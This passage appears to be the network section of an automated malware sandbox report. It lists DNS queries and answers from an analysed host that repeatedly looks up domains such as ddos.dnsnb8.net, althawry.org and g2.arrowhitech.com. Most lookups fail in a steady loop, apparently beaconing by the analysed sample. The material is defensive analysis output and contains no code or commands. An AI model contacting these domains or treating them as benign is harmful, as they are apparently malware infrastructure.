                                  Jul 5, 2024 08:03:56.024960995 CEST6394353192.168.2.91.1.1.1
                                  Jul 5, 2024 08:03:56.033911943 CEST53639431.1.1.1192.168.2.9
                                  Jul 5, 2024 08:03:58.521761894 CEST6296153192.168.2.91.1.1.1
                                  Jul 5, 2024 08:03:58.530093908 CEST53629611.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:02.101398945 CEST5243953192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:02.108762026 CEST53524391.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:03.692785025 CEST5760353192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:03.701126099 CEST53576031.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:05.303884029 CEST6215353192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:05.311902046 CEST53621531.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:10.886929035 CEST5251353192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:10.894423962 CEST53525131.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:12.159807920 CEST5686653192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:12.168991089 CEST53568661.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:13.794507980 CEST5707353192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:13.804615974 CEST53570731.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:15.056780100 CEST6124553192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:15.065406084 CEST53612451.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:17.947072029 CEST4937153192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:17.954627037 CEST53493711.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:20.877856016 CEST5180353192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:20.889190912 CEST53518031.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:23.775285006 CEST5112153192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:23.782605886 CEST53511211.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:25.026144981 CEST5082253192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:25.033696890 CEST53508221.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:26.697851896 CEST5864653192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:26.716573954 CEST53586461.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:28.023828983 CEST6511253192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:28.032803059 CEST53651121.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:33.553235054 CEST5134953192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:33.560702085 CEST53513491.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:35.600212097 CEST5959853192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:35.607798100 CEST53595981.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:37.174834013 CEST6517653192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:37.182511091 CEST53651761.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:38.449553967 CEST6103853192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:38.456892014 CEST53610381.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:40.481334925 CEST6079353192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:40.491493940 CEST53607931.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:43.067888021 CEST6058153192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:43.079343081 CEST53605811.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:45.949203014 CEST6490553192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:45.959526062 CEST53649051.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:49.002238989 CEST6509353192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:49.012496948 CEST53650931.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:51.526016951 CEST6245253192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:51.534329891 CEST53624521.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:54.414920092 CEST5272153192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:54.422445059 CEST53527211.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:57.246725082 CEST6470653192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:57.280215979 CEST6470653192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:57.286803007 CEST53647061.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:57.370037079 CEST53647061.1.1.1192.168.2.9
                                  Jul 5, 2024 08:04:59.307744026 CEST4981453192.168.2.91.1.1.1
                                  Jul 5, 2024 08:04:59.317960978 CEST53498141.1.1.1192.168.2.9

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jul 5, 2024 08:00:56.566150904 CEST192.168.2.91.1.1.10xce96Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:00:58.355937958 CEST192.168.2.91.1.1.10x7c57Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:00:58.399298906 CEST192.168.2.91.1.1.10x5048Standard query (0)www.careerdesk.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:00:59.317718983 CEST192.168.2.91.1.1.10x278dStandard query (0)arthur.niria.bizA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:00.075876951 CEST192.168.2.91.1.1.10x1847Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:00.144154072 CEST192.168.2.91.1.1.10x35a2Standard query (0)apple-pie.inA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:00.886033058 CEST192.168.2.91.1.1.10x19f5Standard query (0)ahmediye.netA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:01.617386103 CEST192.168.2.91.1.1.10xb7efStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:01.633737087 CEST192.168.2.91.1.1.10x4145Standard query (0)ampyazilim.com.trA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:02.636116028 CEST192.168.2.91.1.1.10x4145Standard query (0)ampyazilim.com.trA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:03.971493959 CEST192.168.2.91.1.1.10xb2c9Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:05.280016899 CEST192.168.2.91.1.1.10x74b8Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:06.604614019 CEST192.168.2.91.1.1.10x4f6bStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:11.678304911 CEST192.168.2.91.1.1.10x86b2Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:13.060348988 CEST192.168.2.91.1.1.10x3037Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:14.279167891 CEST192.168.2.91.1.1.10xffd1Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:19.682897091 CEST192.168.2.91.1.1.10xa7b4Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:20.984322071 CEST192.168.2.91.1.1.10xc059Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:22.225702047 CEST192.168.2.91.1.1.10xa51fStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:26.985322952 CEST192.168.2.91.1.1.10xdde2Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:28.282948971 CEST192.168.2.91.1.1.10x180aStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:29.558449030 CEST192.168.2.91.1.1.10xf14fStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:34.152766943 CEST192.168.2.91.1.1.10x36f8Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:35.839073896 CEST192.168.2.91.1.1.10x4c83Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:37.094100952 CEST192.168.2.91.1.1.10x99b5Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:40.324646950 CEST192.168.2.91.1.1.10xa062Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:42.633862019 CEST192.168.2.91.1.1.10x699aStandard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:45.403616905 CEST192.168.2.91.1.1.10x119fStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:47.800978899 CEST192.168.2.91.1.1.10xb91eStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:50.271856070 CEST192.168.2.91.1.1.10x3edfStandard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:52.855772018 CEST192.168.2.91.1.1.10xd99fStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:55.250895023 CEST192.168.2.91.1.1.10x4e4fStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:57.717041016 CEST192.168.2.91.1.1.10xa8e6Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:00.613709927 CEST192.168.2.91.1.1.10xe2b5Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:03.083441973 CEST192.168.2.91.1.1.10x9521Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:05.493572950 CEST192.168.2.91.1.1.10xea2Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:08.014801025 CEST192.168.2.91.1.1.10xa1e6Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:10.491012096 CEST192.168.2.91.1.1.10x15a2Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:12.951208115 CEST192.168.2.91.1.1.10xef15Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:15.671540976 CEST192.168.2.91.1.1.10xb721Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:18.224603891 CEST192.168.2.91.1.1.10xd63cStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:21.563211918 CEST192.168.2.91.1.1.10xdfa3Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:24.112840891 CEST192.168.2.91.1.1.10x7786Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:26.500451088 CEST192.168.2.91.1.1.10xeb4fStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:29.070604086 CEST192.168.2.91.1.1.10x3913Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:32.204401970 CEST192.168.2.91.1.1.10x6005Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:34.721455097 CEST192.168.2.91.1.1.10x3322Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:37.266876936 CEST192.168.2.91.1.1.10x23ccStandard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:39.948540926 CEST192.168.2.91.1.1.10x7e37Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:42.555938959 CEST192.168.2.91.1.1.10x5b54Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:45.671623945 CEST192.168.2.91.1.1.10x482bStandard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:47.190135002 CEST192.168.2.91.1.1.10x6b4aStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:48.472882032 CEST192.168.2.91.1.1.10x585Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:50.116909027 CEST192.168.2.91.1.1.10xc784Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:53.142081022 CEST192.168.2.91.1.1.10x4397Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:56.099405050 CEST192.168.2.91.1.1.10x725fStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:59.467448950 CEST192.168.2.91.1.1.10x5e56Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:02.031646013 CEST192.168.2.91.1.1.10xb922Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:04.087146997 CEST192.168.2.91.1.1.10x360fStandard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:05.509190083 CEST192.168.2.91.1.1.10x110dStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:11.079212904 CEST192.168.2.91.1.1.10xbeeStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:12.723651886 CEST192.168.2.91.1.1.10x65acStandard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:14.102313042 CEST192.168.2.91.1.1.10xcfe1Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:16.946657896 CEST192.168.2.91.1.1.10x8558Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:19.553204060 CEST192.168.2.91.1.1.10x5beeStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:22.490536928 CEST192.168.2.91.1.1.10x58bbStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:26.478014946 CEST192.168.2.91.1.1.10x1283Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:27.742805958 CEST192.168.2.91.1.1.10xa6acStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:28.985848904 CEST192.168.2.91.1.1.10x94feStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:31.962069988 CEST192.168.2.91.1.1.10xeed3Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:34.795708895 CEST192.168.2.91.1.1.10x47e0Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:37.422729969 CEST192.168.2.91.1.1.10x6905Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:39.012613058 CEST192.168.2.91.1.1.10x9181Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:40.295407057 CEST192.168.2.91.1.1.10x5ba3Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:45.787741899 CEST192.168.2.91.1.1.10xeb28Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:47.499094963 CEST192.168.2.91.1.1.10xe17Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:48.828450918 CEST192.168.2.91.1.1.10xc1ebStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:50.123804092 CEST192.168.2.91.1.1.10x3db1Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:53.067485094 CEST192.168.2.91.1.1.10x95f9Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:56.024960995 CEST192.168.2.91.1.1.10xe4fcStandard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:58.521761894 CEST192.168.2.91.1.1.10xb275Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:02.101398945 CEST192.168.2.91.1.1.10x723dStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:03.692785025 CEST192.168.2.91.1.1.10x6de7Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:05.303884029 CEST192.168.2.91.1.1.10x58d5Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:10.886929035 CEST192.168.2.91.1.1.10x157eStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:12.159807920 CEST192.168.2.91.1.1.10xca3dStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:13.794507980 CEST192.168.2.91.1.1.10x3431Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:15.056780100 CEST192.168.2.91.1.1.10xdce1Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:17.947072029 CEST192.168.2.91.1.1.10x4d13Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:20.877856016 CEST192.168.2.91.1.1.10x4a41Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:23.775285006 CEST192.168.2.91.1.1.10x2488Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:25.026144981 CEST192.168.2.91.1.1.10xac1dStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:26.697851896 CEST192.168.2.91.1.1.10x9007Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:28.023828983 CEST192.168.2.91.1.1.10xf5c0Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:33.553235054 CEST192.168.2.91.1.1.10x6bc6Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:35.600212097 CEST192.168.2.91.1.1.10xe271Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:37.174834013 CEST192.168.2.91.1.1.10x3f7cStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:38.449553967 CEST192.168.2.91.1.1.10x6530Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:40.481334925 CEST192.168.2.91.1.1.10x6f1bStandard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:43.067888021 CEST192.168.2.91.1.1.10x9b9fStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:45.949203014 CEST192.168.2.91.1.1.10x59cbStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:49.002238989 CEST192.168.2.91.1.1.10x678fStandard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:51.526016951 CEST192.168.2.91.1.1.10xc9a2Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:54.414920092 CEST192.168.2.91.1.1.10x6859Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:57.246725082 CEST192.168.2.91.1.1.10xb388Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:57.280215979 CEST192.168.2.91.1.1.10xb388Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:59.307744026 CEST192.168.2.91.1.1.10x679cStandard query (0)amsamex.comA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jul 5, 2024 08:00:51.443166018 CEST1.1.1.1192.168.2.90xd4e7No error (0)windowsupdatebg.s.llnwi.net46.228.146.128A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:00:56.758446932 CEST1.1.1.1192.168.2.90xce96No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:00:58.372610092 CEST1.1.1.1192.168.2.90x7c57Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:00:58.499944925 CEST1.1.1.1192.168.2.90x5048No error (0)www.careerdesk.org54.244.188.177A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:00:59.506690025 CEST1.1.1.1192.168.2.90x278dNo error (0)arthur.niria.biz44.221.84.105A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:00.110564947 CEST1.1.1.1192.168.2.90x1847Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:00.340749979 CEST1.1.1.1192.168.2.90x35a2No error (0)apple-pie.in44.221.84.105A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:00.908406019 CEST1.1.1.1192.168.2.90x19f5No error (0)ahmediye.net78.46.2.155A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:01.629900932 CEST1.1.1.1192.168.2.90xb7efName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:02.684145927 CEST1.1.1.1192.168.2.90x4145No error (0)ampyazilim.com.tr37.230.104.89A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:02.688806057 CEST1.1.1.1192.168.2.90x4145No error (0)ampyazilim.com.tr37.230.104.89A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:03.987617016 CEST1.1.1.1192.168.2.90xb2c9Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:05.314321995 CEST1.1.1.1192.168.2.90x74b8Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:06.613374949 CEST1.1.1.1192.168.2.90x4f6bName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:11.694328070 CEST1.1.1.1192.168.2.90x86b2Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:13.070161104 CEST1.1.1.1192.168.2.90x3037Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:14.287586927 CEST1.1.1.1192.168.2.90xffd1Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:19.703089952 CEST1.1.1.1192.168.2.90xa7b4Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:20.992537975 CEST1.1.1.1192.168.2.90xc059Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:22.233885050 CEST1.1.1.1192.168.2.90xa51fName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:27.000699997 CEST1.1.1.1192.168.2.90xdde2Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:28.320081949 CEST1.1.1.1192.168.2.90x180aName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:29.567009926 CEST1.1.1.1192.168.2.90xf14fName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:34.563486099 CEST1.1.1.1192.168.2.90x36f8Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:35.869797945 CEST1.1.1.1192.168.2.90x4c83Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:37.107933044 CEST1.1.1.1192.168.2.90x99b5Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:40.334580898 CEST1.1.1.1192.168.2.90xa062Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:42.723026991 CEST1.1.1.1192.168.2.90x699aName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:45.412585974 CEST1.1.1.1192.168.2.90x119fName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:47.812868118 CEST1.1.1.1192.168.2.90xb91eName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:50.281173944 CEST1.1.1.1192.168.2.90x3edfName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:52.876668930 CEST1.1.1.1192.168.2.90xd99fName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:55.282987118 CEST1.1.1.1192.168.2.90x4e4fName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:57.725929976 CEST1.1.1.1192.168.2.90xa8e6Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:00.621577978 CEST1.1.1.1192.168.2.90xe2b5Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:03.118643999 CEST1.1.1.1192.168.2.90x9521Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:05.510930061 CEST1.1.1.1192.168.2.90xea2Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:08.026454926 CEST1.1.1.1192.168.2.90xa1e6Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:10.523000956 CEST1.1.1.1192.168.2.90x15a2Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:12.960856915 CEST1.1.1.1192.168.2.90xef15Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:15.680389881 CEST1.1.1.1192.168.2.90xb721Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:18.231976032 CEST1.1.1.1192.168.2.90xd63cName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:21.578538895 CEST1.1.1.1192.168.2.90xdfa3Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:24.121613979 CEST1.1.1.1192.168.2.90x7786Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:26.511472940 CEST1.1.1.1192.168.2.90xeb4fName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:29.080622911 CEST1.1.1.1192.168.2.90x3913Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:32.211988926 CEST1.1.1.1192.168.2.90x6005Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:34.754734039 CEST1.1.1.1192.168.2.90x3322Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:37.276307106 CEST1.1.1.1192.168.2.90x23ccName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:39.956608057 CEST1.1.1.1192.168.2.90x7e37Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:42.563149929 CEST1.1.1.1192.168.2.90x5b54Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:45.679330111 CEST1.1.1.1192.168.2.90x482bName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:47.198189974 CEST1.1.1.1192.168.2.90x6b4aName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:48.480132103 CEST1.1.1.1192.168.2.90x585Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:50.227901936 CEST1.1.1.1192.168.2.90xc784Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:53.151412010 CEST1.1.1.1192.168.2.90x4397Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:56.106571913 CEST1.1.1.1192.168.2.90x725fName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:59.475595951 CEST1.1.1.1192.168.2.90x5e56Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
